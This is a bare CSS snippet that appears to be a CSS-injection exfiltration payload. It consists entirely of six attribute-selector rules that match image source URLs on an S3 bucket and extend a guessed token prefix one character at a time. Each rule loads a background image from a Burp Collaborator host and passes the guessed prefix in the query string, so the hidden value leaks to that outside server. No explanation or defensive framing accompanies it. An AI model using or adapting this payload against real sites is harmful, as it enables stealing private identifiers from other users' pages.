img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkg"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkg);
}
img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkggd"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkggd);
}
img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkggd9"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkggd9);
}
img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkggd9q"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkggd9q);
}
img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkggd9qi"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkggd9qi);
}
img[_ngcontent-c32][src^="https://finos-public-stag-bucket.s3-accelerate.amazonaws.com/investors/1637638391292trkggd9qib"] {
    background: url(https://rsnbhnx4gd62ybcguz5tiat5awgp4e.burpcollaborator.net?distributorId^=1637638391292trkggd9qib);
}